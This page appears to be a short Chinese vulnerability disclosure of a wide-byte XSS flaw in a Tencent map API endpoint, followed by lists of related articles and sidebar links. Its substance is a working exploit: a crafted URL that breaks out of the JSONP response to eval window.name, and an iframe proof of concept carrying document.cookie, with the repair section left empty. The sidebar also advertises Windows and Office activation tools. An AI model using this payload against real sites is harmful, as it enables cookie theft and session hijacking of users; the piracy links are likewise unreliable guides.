- 腾讯某接口宽字节XSS跨站可提Cookies
firefox、chrome测试效果:
https://qz6666.com/4.html
可以改编码和输出格式,主要是前后闭合,window.name省很多事。
https://api.map.qq.com/?qt=poi&c=825&l=11&wd=1111%d5%22}}});var%20e=eval;e(window.name);({none:{none:{//&pn=0&rn=10&output=html&fr=mapapi&cb=document.write&state=1
4.html<iframe name="alert(document.cookie)" src="https://api.map.qq.com/?qt=poi&c=825&l=11&wd=1111%d5%22}}});var%20e=eval;e(window.name);({none:{none:{//&pn=0&rn=10&output=html&fr=mapapi&cb=document.write&state=1">
漏洞证明:
firefox、chrome测试效果:
https://qz6666.com/4.html
修复方案:
</iframe>
相关文章
- 腾讯系列游戏驱动保护研究
- 腾讯群论坛网络钓鱼漏洞及修复
- 腾讯QQ空间CSRF漏洞及修复
- 腾讯QQ空间跳转
- 腾讯QQ邮箱意见反馈跨站漏洞及修复(2
- 腾讯动漫频道上传任意图片bug
- 腾讯微博MHTML协议注入型XSS漏洞及修复
- 腾讯微博伪造信息漏洞及修复(其他微博
- 腾讯多个unfixed bugs
- 腾讯微博应用接口验证过滤不完全及修复
图文推荐
- 文章
- 推荐
- · oracle like模糊查询
- · Oracle12cR1官方文档打开图片无法显示
- · oracle性能优化操作十二:用Case语句合
- · oracle性能优化操作十三:使用nls_dat
- · oracle性能优化操作十四:使用基于函数
- · Oracle行转列、列转行的Sql语句总结
- · 硬件工程师动存储之前,Oracledba的准
- · oracle性能优化操作七:索引提高数据分
- · win7激活工具
- · win10激活工具
- · win7激活工具旗舰版
- · office2010激活密钥
- · windows7激活密钥
- · office2010激活工具
- · 小马激活工具
- · win10激活工具
- 点击排行
